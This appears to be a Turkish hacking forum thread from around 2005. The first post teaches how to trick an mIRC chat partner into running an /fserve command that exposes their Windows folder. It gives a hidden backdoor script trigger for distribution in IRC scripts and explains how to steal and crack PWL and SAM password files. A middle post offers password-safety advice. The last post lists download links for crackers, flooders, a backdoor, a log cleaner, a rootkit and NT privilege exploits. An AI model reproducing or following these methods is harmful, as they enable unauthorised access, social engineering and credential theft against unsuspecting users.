Mirc Üzerinden Bilgisayarlara Girme (Hack)

zeek44
Acemi Üye
Giriş Tarihi: Jun 2005
:: Mirc Üzerinden Bilgisayara Girilebilir ::

Bugüne kadar remote bir bilgisayara girmek için birsürü yol öğrendiniz. Trojanlar, NetBIOSlar, Ağ tanıtımları, Telnet vs.. vs.. Ama Internetin bukadar yaygınlaşmasında büyük rol oynayan mIRC ile bunu yapabileceğinizin aklınıza geldiğini sanmıyorum..

Şimdi size lafı fazla uzatmadan kısa bir döküman okutacağım..

Öncelikle bu yöntemin çok az kişi tarafından bilindiğini söyleyebilirim.. Bu nedenle işinizi fazla çaktırmadan yapınki.. bu yöntemde diğerleri gibi herkesin eline düşüp telef olmasın..

Bu yöntemle karşı taraftan dosya aktarımı yapabilirsiniz. Ancak dosya silemezsiniz. Fakat bizim işimizede yarayacak olan *.pwl dosyaları. tabi sizin kişisel istekeriniz varsa onlarıda download etmeniz mümkün.

Şimdi karşı taraftaki muhabbet ettiğiniz kişiye

//fserve nikiniz magtext rootdirectory welcomefile

Bu komutta yerine oturan şeyleri yazdırmanız gerekir. Bunları biraz açıklayacak olursam.

Nickname: Sizin nickiniz
Magtext: Aynı anda kaç dosya çekebileceğinizi belirten bölümdür.
Root Directory: Karşı tarafın bilgisayarında erişeceğiniz dizini belirtir. Mesela "C:\WINDOWS\" gibi...
Welcome File: Bu son derece gereksiz. Ama böyle bir parametrede var ve bende bunu açıkayim dedim. Buda siz PCye eriştiğiniz zaman sizi karşılayacak text dosyasıdır.

Şimdi komutu bir örnekle açıklayalım.. Mesela bilgisayarına girmek istediğimiz kişinin nicki "Yanliz_Ve_Mutlu" olsun bizim nickimizde Virus "Yanliz_Ve_Mutlu" Kullanıcısına şu komutu yazdırmayı başarmanız gerekir.

//Fserve Virus 10 C:\WINDOWS\ TRhc.txt

Şimdi burda "Yanliz_Ve_Mutlu" Virus nickinin C:\WINDOWS\ dizinine girmesine izin veriyor. Ve dizinden 10 dosya download edebilmesine izin veriyor. Böylece Virus nickine sahip kullanıcının *.PWL dosyalarına erişebilmesinide sağlamış oluyor.

Evet buraya kadar kullanıcıya yazdırmanız gereken komutu anlattım.. Şimdide bunu Script yazarları için bir nevi server dosyası haline dönüştürmek için gerekli komutlara bakalım.. Hatırlarsanız eskiden Dragon ve Solucan scriptlerde basit bir "Remote Control" sistemi vardı. Sizde daha gelişmiş birşeyler yazabilirsiniz.

ON 1:TEXT:*TurkHackerCenter:?: {
if ($nick == Virus) { /fserve virus 10 C:\ debug.txt | /close -m virus }
else HALTDEF
}

Yukardaki komutta gördüğünüz şeyin açıklaması şudur. Siz Virus nickine sahipsiniz ve sizin scriptinizi kullanan bir kullanıcı var onun bilgisayarına erişmek için ona "TurkHackerCenter" yazısını gönderiyorsunuz. Sonrada o size C:\ dizini için giriş veriyor. Tabi sizin pencerenizi hemen kapatıyor ve şifrenin kullanıcının eline geçmesini engelleiyor. Böylece sizde sadece kendinize özel bir sistemin güvenliğini sağlamış oluyorsunuz. Tabi en en kolay komutu verdim. Bunu geliştirip kişisel uyarlamalarla daha güvenli hale falan getirmenizde mümkün..

Yanlız unutmayınki.. Kurbanın sizin girmenize izin verdiği dizinden daha alt dizinlere geçemezsiniz. Fakat daha yukarılara çıkabilirsiniz. Bunu bir örnekle açıklayacak olursam şöyle anlatabilirim. Mesela Kullanıcı size "/fserve virus 10 C:\WINDOWS\ debug.txt" komutuNU Kullanarak geçiş verdi. Bu komuttan sonra C:\WINDOWS\System32 dizinine geçebilirsiniz. ama C:\ dizinine inemezsiniz.

Ayrıca dizin değiştirmek dosyaları download etmek için bazı komutlar var onlarda şöyle..

CD "Directory": Dizin değiştirmenizi sağlayan komut
Exit: Çıkış
Get "filename": Dosyaları indirmek için kullanılır. (Uzantısıyla birlikte yazılır)
Help: Yardım
Ls: Dizindeki dosyaları listeler.

Bundan sonrası size kalmış dizin değiştirip *.PWL dosyalarını kendi bilgisayarınıza aktarın sonrada PWL Crackerlarla kırın ve istediğiniz şifreyi alın.. Hatta size PWL Şifrelerini çözmek için PWL Toolr programınıda tavsiye edebilirim.
Unutmadan PWL dosyaları SADECE Windows 98 de bulunmaktadır.Peki XP eyse ne yapcaz XP de ise PWL dosyasında değilde SAM isimli bir dosyada bulunmaktadır.....
Alıntıdır...

WWWWW
Acemi Üye
Giriş Tarihi: Jun 2005
Mesajlar: 36
Arkadaşlar hep hack bilgimi vereceğiz birazda anti-hack bilgileri verelim.Ava Giderken Avlanmayalım

Şifrelerin Seçilmesi

Gün geçtikçe teknoloji ve internet gelişmekte ve bu beraberinde bir takım problemleri de getirmektedir. Yabancıların bilgisayarlara erişmesi, bu problemlerin en başında gelmektedir. Bu amaçla bazı önlemler alınmaya çalışılmıştır. Şifre(password)ler bu önlemlerden bir tanesidir, belki de en önemlisidir. Belli yerlere konan şifrelerle yabancı kişilerin erişimi engellenmeye çalışılmaktadır. Buna rağmen şifre engeli de bazen aşılabilmektedir. Bir takım programlarla şifreler tahmin edilebilmektedir.

Alıntıdır.......

Kötü Şifreler

Kötü bir şifre kolaylıkla tahmin edilebilen bir şifredir. Bazı şifre çözücü programlar alfabedeki bütün karakterleri kullanarak, deneme yanılma yoluyla şifre çözerken; bazıları da genel şifreleri içeren bir liste kullanırlar. Modern bir normal PC bile güzel bir şifre tahminleme programı ile binlerce şifreyi bir günden az bir zamanda deneyebilir.

Popüler ve kötü bir şifre nasıl olur? Bazı örnekler; isminiz, eşinizin ismi veya anne ve babanızın ismi. Diğer kötü şifreler bu isimlerin tersten yazılması veya bir rakam eklenmesi şeklindedir. Kısa şifreler de kötü şifrelerdir, çünkü tahmin edilmesi daha kolaydır. Bilgisayar isimleri ve benzeri şifreler de kötü şifrelerdir. Gizli ve tahmin edilemez gibi görünse de aslında oldukça yaygın kullanılmaktadır. Diğer kötü seçimler telefon numaraları, en çok beğenilen filmlerden kitaplardan karakterler, yerel yerleşim yerleri, favori içecekler ve ünlü bilim adamları gibi. Bu isimlerin büyük harfle yazılı olanları veya ters çevrilmiş olanları da pek iyi değildir. “l” (küçük L) ile “1” i veya “E” ile “3” ü değiştirmek, başa veya sona bir rakam eklemek veya kelimelerin basit modifikasyonları da pek iyi değildir. Kelimelerin yabancı dillere çevrilmesini de iyi olarak nitelendiremeyiz. Birçok farklı dil olmasına rağmen internetten kolaylıkla herhangi bir dilde sözlük indirebiliriz. Örneğin unix de ...\finger ile.

Bazı sistemlerde kullanıcıların kötü şifre seçmeleri engellenmeye çalışılmaktadır. Örneğin hepsi büyük veya küçük harf olan ve 6 karakterden kısa olan veya kısa olup da içerisinde alfabetik karakter haricinde karakter içermeyen şifreler bazı sistemler tarafından kabul edilmemektedir.

Yapılan araştırmalarda birçok sistemde şifresi accountı ile aynı olan kullanıcılara rastlanmıştır. Bu tip accountlar “Joes“ olarak adlandırılmaktadır. Joes accountları şifre kırıcılar tarafından kolaylıkla tahmin edilmektedir. Bu nedenle bazı sistemlerde Joes accountlarına izin verilmemektedir. Buradan da bütün kullanıcıların listesinin dış dünyaya açık olmasının ne kadar yanlış olduğunu anlıyoruz.
İyi şifreler kolaylıkla tahmin edilemeyen şifrelerdir. İyi şifreleri tahmin etmek zordur çünkü :
Büyük ve küçük harf içerirler
Noktalama işaretleri ve rakamlar içerirler

Bazı kontrol karakterleri ve/veya boşluklar içerirler
Kolaylıkla hatırlanabilirler ve bu nedenle bir yere not edilme ihtiyacı duymazlar
Yedi , sekiz karakter uzunluğundadırlar.
Kolay ve hızlı yazılırlar; ve böylece etraftan bakan birisi ne yazdığını anlayamaz
İyi şifrelerin seçilmesi aslında oldukça kolaydır. Bazı tavsiyeler
İki kısa kelime özel bir karakter veya bir sayı ile birleştirilebilir. Örn: robot7benim
Size özel bir kısaltma yapabilirsiniz. Örn: bshKBBs (Bu Sınıftaki Hiç Kimse Bisiklete Binmeyi Sevmez)
Bununla birlikte bu şifrelerin hepsi kötü şifrelerdir, çünkü hepsi buraya yazıldı...
Şifre seçerken aşağıdakilerden sakının;
Sizin , eşinizin veya iş arkadaşınızın ismi
Çocuğunuzun veya ev hayvanınızın ismi
Yakın arkadaşlarınızın isimleri
Çok beğenilen sanatçıların isimleri
Patronunuzun ismi
Herhangi birisinin ismi
Kullanmakta olduğunuz işletim sisteminin ismi
Bilgisayarınızın ismi
Telefon veya lisans numaranız
Sosyal güvenlik numaranızın herhangi bir parçası
Herhangi birisinin doğum tarihi
Sizin hakkınızda kolaylıkla bulunabilecek bir bilgi (adres gibi)
Birtakım kalıplaşmış kelimeler ( wizard, gurup, gandalf...)
Bilgisayarınızdaki herhangi bir kullanıcının ismi ( büyük harfli, çift harfli, ...)
Yabancı bir dildeki bir kelime
Yer isimleri gibi özel isimler
Aynı harften oluşan bütün şifreler
Basit harf düzenlerinden oluşan bütün şifre (qwerty gibi)
Yukarıda listelenenlerin tersten yazılmış halleri
Yukarıda listelenenlerin önüne veya arkasına rakam eklenmiş halleri
Rakamlar, noktalama işaretleri ve kontrol karakterlerinin kullanılmasıyla değişik şifre oluşturma olasılığı önemli ölçüde artacak ve bununla birlikte şifrenin tahmin edilme olasılığı da azalacaktır.
Eğer birkaç tane hesab(account)ınız varsa aynı şifreyi bütün hesaplarda kullanabilirsiniz. Bu şekilde hatırlamanız da kolay olacaktır. Fakat bu accountlardan birinin şifresi öğrenildiğinde bütün accountlarınızın şifreleri ortaya çıkmış olacaktır. Böyle bir durumda temel bir şifre oluşturulur ve her farklı makine için modifiye edilir. Örneğin sizin temel şifreniz kxyzzy olsun. İsmi “athena” olan bir makinede şifreniz kxyzzya olurken ismi “ems” olan bir makinede şifreniz kxyzzye olacaktır.
Unutulmaması gereken önemli bir nokta da şifrelerin herhangi bir yere yazılmamasıdır. Sebep oldukça basittir: Eğer şifrenizi bir yere yazarsanız, birisi onu bulabilir ve bilgisayarınıza kolaylıkla girebilir. Akılda tutulan bir şifre yazılan bir şifreden her zaman için daha iyidir. Örneğin şifresini cüzdanında bir yerde saklayan bir kişi cüzdanını çaldırdığında cüzdanı çalan kişi kolaylıkla bilgisayara girebilir.
Eğer ki illa şifrenizi yazmanız gerekiyorsa bazı şeylere dikkat edilmelidir:

Şifreyi bir yere yazdığınızda onun şifre olduğunu yazmayın.
Aynı kağıt parçasına hesap ismini , network ismini veya bilgisayarın numarasını yazmayın.
Şifreyi terminalin, klavyenin veya bilgisayarın herhangi bir parçasına iliştirmeyin.
Şifreyi direk yazmayın, onun yerine diğer karakterlerle veya bu karakterleri sizin kolayca hatırlayabileceğiniz bir şekilde karıştırarak yazınız.

Şifre yazarken sakınılacak bir takım şeyler:

Şifreyi düzenleme yapmadan online olarak kaydetmeyiniz. (dosyaya, veri tabanına veya e-mail mesajına)
Asla bir şifreyi başka bir kullanıcıya email ile göndermeyiniz. Örneğin birisi sistemde text dosyalarında ve email mesajlarında “şifre” kelimesini aratarak şifreye erişebilir.
Login şifreniz asla uygulama programlarınızın şifresi olmasın. Mesela login şifreniz internete bağlanmak için kullandığınız şifreyle aynı olmasın. Bu uygulamalardaki şifreler bazı kişiler tarafında kontrol edilebilir ve yanlış kişilerin eline geçebilir.
Aynı şifreyi farklı organizasyonlar tarafından kullanılan farklı bilgisayarlarda kullanmayınız. Bir tanesi öğrenildiğinde bütün bilgisayarlara erişilebilir.
Bu son maddeyi uygulaması gerçekte oldukça zordur.
Kötü şifrelerin tehlikesini azaltmanın en etkili yolu geleneksel şifreleri

kullanmamaktır. Onun yerine siteniz tek seferlik şifreleri kullanmanıza olanak sağlayan yazılım veya donanımları yükleyebilir. Tek seferlik şifreler sadece bir kere kullanılan şifrelerdir.
Bir kullanıcı olarak size şifrelerin bir listesi verilebilir. Makinenize her girişinizde bu şifrelerden bir tanesini kullanırsınız ve onu listeden silersiniz. Bir sonraki girişinizde başka bir şifreyi kullanırsınız. Veya size bir kart verilebilir ve her dakika bu karttaki numara değişir. Veya taşıyabileceğiniz küçük bir hesap makinesi verilebilir. Bilgisayara girmek istediğinizde size bir numara verecektir. Bu numarayı ve kimlik numaranızı hesap makinesine girdiğinizde bunun sonucunda çıkan numarayı bilgisayarınıza girmek için kullanabilirsiniz.
Tek seferlik şifrelerin kullanılması geleneksel şifrelerin güvenlik açığını biraz daha kapatmaktadır ama ek yazılım ve donanım gerektirmesi nedeniyle yaygın olarak kullanılmamaktadır.
Sisteminizi korumak için en temel ve önemli tavsiyeler şunlardır:

Mümkünse tek seferlik şifreler kullanın.
Değilse;

Her accountun ayrı bir şifresi olmasını sağlayın.
Her kullanıcının güçlü, iyi bir şifre seçmesini sağlayın.
Şifrenizi diğer kullanıcılara veya herhangi birine söylemeyiniz.

Turkey_King
Profesyonel
Giriş Tarihi: May 2005

BÖLÜMÜZÜN İLK TOPİCİ BENDEN OLSUN DEDİM REPUTU UNUTMAYIN ! BÜTÜN HACK PROGRAMLARI JOHN
John the Ripper (Win32 v1.6) 0,8 MB
http://www.openwall.com/john/b/john-16w.zip

JOHN
John the Ripper (Dos v1.6) 0,7 MB
http://www.openwall.com/john/b/john-16d.zip

JOHN
John the Ripper (Unix tar.gz v1.6) 0,4 MB
http://www.openwall.com/john/a/john-1.6.tar.gz

WEBCRACKER
WebCracker v4.0 1,2 MB
http://downloads.securityfocus.com/tools/WebCrack40.zip

GRINDER
Scanner Automatizado vulnerabiliades v1.1 1,13 MB
http://packetstormsecurity.org/grou...9/grinder11.zip

LEGION
Legion v.2.1 Scanner Recursos Compartidos 1,91 MB
http://packetstormsecurity.org/grou...9/legionv21.zip

NETCAT
NetCat para NT v1.1 0,09 MB
http://safariexamples.informit.com/...t/NT/nc11nt.zip

CAIN
Cain v.2.5 Beta 57 (Win 2000,NT,XP) 2,5 MB
http://www.oxid.it/downloads/cain25b57.exe

WINPCAP
Librerías para el Cain (WinPcap 3.0) 0,4 MB
http://winpcap.polito.it/install/bin/WinPcap_3_0.exe

CAIN
Cain 2.0 Crackea pwl, sniffer, etc. (Win 9X) 0,6 MB
http://www.oxid.it/downloads/cain20.exe

RAINBOW
Rainbow Table Generator v1.0 0,1 MB
http://www.oxid.it/downloads/winrtgen.zip

RAINBOW
RainbowCrack v1.2 Win32 0,5 MB
http://www.antsight.com/zsl/rainbow...ack-1.2-win.zip

RAINBOW
RainbowCrack v1.2 src Win/Linux 0,04 MB
http://www.antsight.com/zsl/rainbow...ack-1.2-src.zip

ARP-WORKS
Arp-Work Network Utility ARP N.D
http://www.oxid.it/downloads/arpworks10.exe

UDPFLOOD
UDPFlood v2.0 N.D
http://www.foundstone.com/resources...ls/udpflood.zip

WEBSLEUTH
WebSleuth (seguridad web-servers) 2,6 MB
http://www.sandsprite.com/Sleuth/SleuthSetup.exe

WEBSCAN

WebScan v0.92b Scanner cgi's,asp, etc 0,05 MB
http://www.ryuhou.no-ip.com/elhacke.../webscan.tar.gz

XNSSCAN
Xnsscan v0.22 Crackeador ftp,pop3,etc 0,037 MB
http://www.ryuhou.no-ip.com/elhacke...can-0.22.tar.gz

SHOWPASS
Showpass v1.0 N.D
http://www.ipwar.it/ipwartool/showpassv10.zip

IPTOOLS
IP-Tools v2.08 1,1 MB
http://mirror1.ks-soft.mastak.com/download/ip-tools.exe

IPTOOLS
IP-Tools v2.08 (Mirror) 1,1 MB
http://ks-soft.mastak.com/users/kss...ad/ip-tools.exe

ESSENTIAL
Essential NetTools 3.1 1,4 MB
http://www.tamos.com/files/ent3.zip

ESSENTIAL
Manual (Help File) del Essential NetTools 3.1 N.D
ftp://ftp.tamos.com/docs/en31_help_es.zip

SMBDIE
Overflow de netbios 0,2 MB
http://www.ryuhou.no-ip.com/elhackernet/h/SMBdie.zip

SMBAUD
SMB Auditing Tool 1.0.4 1 MB
http://www.cqure.net/tools/smbat-win32bin-1.0.4.zip

SMBPROXY
SMB Proxy Tool 0,2 MB
http://www.cqure.net/tools/smbproxy-win32bin-1.0.0.zip

MSWIN
Libreria Visual Basic (MS Winsock) 0,55 MB
http://www.ryuhou.no-ip.com/elhackernet/h/mswinsck.zip

LANZADERA
Bug del ISAPI 0,01 MB
http://www.ryuhou.no-ip.com/elhacke...nzadorisapi.zip

PQWAK
scanner netbios 0,01 MB
http://www.ryuhou.no-ip.com/elhackernet/h/pqwak2.zip

ARP
ArpInject 0,1 MB
http://www.security.nnov.ru/files/PTwebdav.zip

WEBDAV
IIS WebDav vulnerability testing tool 0,1 MB
http://packetstormsecurity.org/Win/arpinject.zip

HTTP
Http Flooder - Packet Storm 1.3 - By Subby 0,1 MB
http://www.ryuhou.no-ip.com/elhacke...ketStorm1.3.zip

RPC
RpcScan 0,4 MB
http://www.ryuhou.no-ip.com/elhacke.../RpcScan101.zip

MDCRACK
MDcrack 1.2 linux (Crackea MD5/MD4/NTLM hashes) 0,04 MB
http://c3rb3r.openwall.net/mdcrack/...rack-1.2.tar.gz

MDCRACK
MDcrack 1.2 win32 0,2 MB
http://c3rb3r.openwall.net/mdcrack/download/mdcrack.exe

MDCRACK
MDcrack 1.2 FrontEnd 0,2 MB
http://c3rb3r.openwall.net/mdcrack/...AddFrontend.zip

GENXE
GenXE: Generador de Cross Site Scripting 0,1 MB
http://genxe.sourceforge.net/genxe-beta-0.9.0.zip

TFTPD32
Servidor TFTP 0,1 MB
http://perso.wanadoo.fr/philippe.jo...tftpd32.273.zip

PASSKIT
Passware Kit Enterprise v6.1 3,5 MB
http://www.lostpassword.com/demos/kitd.exe

THC-HYDRA
THC-Hydra Version: 4.2 0,1 MB
http://www.thc.org/releases/hydra-4.2-src.tar.gz

H a c k i n g NT / 2000
Crackeadores de passwords y herramientas para el NT / 2000

DSSCAN
DSScan (Scanner para vulnerabilidad LSASS) 20 KB
http://www.ryuhou.no-ip.com/elhackernet/h/dsscan.zip

ACKCMD
AckCmd is a backdoor client/server 0,01 MB
http://ntsecurity.nu/downloads/ackcmd.zip

CLEARL
ClearLogs clears the event log 0,01 MB
http://ntsecurity.nu/downloads/clearlogs.exe

DUMP
DumpUsers is able to dump account names 0,01 MB
http://ntsecurity.nu/downloads/dumpusers.exe

HD
Hacker Defender v1.0.0 (rootkit) 0,2 MB
http://hxdef.czweb.org/release/hxdef100.zip

RK
RKDetector 0.62 (Detector rootkits) 65 KB
http://www.haxorcitos.com/ficheros/RKDetectorv0.62.zip

NAT
NetBIOS Auditing Tool 0,9 MB
http://www.ryuhou.no-ip.com/elhackernet/h/nat.zip

DUMPEVT
Vuelca Registro NT 0,07 MB
http://www.systemtools.com/download/dumpevt.zip

DUMPACL
Exploracion Remota NT 1,91 MB
http://www.systemtools.com/download/dumpacl.zip

GET-ADMIN
Bug Windows NT (Crea usuario admin..) 0,04 MB
http://www.ryuhou.no-ip.com/elhackernet/h/getadmin.zip

SECHOLE
Bug Windows NT (Parecido al getadmin) 0,05 MB
http://www.antiserver.it/Win NT/Penetration/download/nt-sechole2.zip

PWD-DUMP2
Extrae Info del SAM 0,05 MB
http://packetstormsecurity.org/Crackers/NT/pwdump2.zip

PWD-DUMP3
Extrae Info del SAM 0,05 MB
http://packetstormsecurity.org/Crackers/NT/pwdump3.zip

L0PTH
Crackeador passwords NT (Archivo SAM) 1,0 MB
http://www.ryuhou.no-ip.com/elhackernet/h/lopth.zip

L0PTH
L0phtCrack 5.03 5.4 MB
http://www.atstake.com/products/lc/...er/lc5setup.exe

NETBIOS
Netbios scanner para el NT 0,3 MB
http://www.ryuhou.no-ip.com/elhackernet/h/nbtscan.zip

NTFS-DOS
Convierte ntfs (NT) a dos (FAT) 0,3 MB
http://www.ryuhou.no-ip.com/elhackernet/h/ntfsdos.zip

UNICODE
Scanner del Unicode del ISS (SSH) 0,2 MB
http://www.ryuhou.no-ip.com/elhacke.../URLScanner.zip

UNICONSOLE
Consola del Unicode (SSH) 0,01 MB
http://www.ryuhou.no-ip.com/elhacke.../uniconsole.zip
..
SCAN
Code Red Scanner del eEye Digital Security 0,1 MB
http://www.ryuhou.no-ip.com/elhacke...eRedScanner.zip

IIS-CRASH
Cuelga versiones viejas del IIS del NT 0,1 MB
http://www.ryuhou.no-ip.com/elhackernet/h/Iiscrash.zip

SQLPOKE
MSSQL Servers N.D
http://packetstormsecurity.org/NT/scanners/Sqlpoke.zip

SQLBF
Fuerza bruta en MSSQL Servers N.D
http://packetstormsecurity.org/Crackers/sqlbf.zip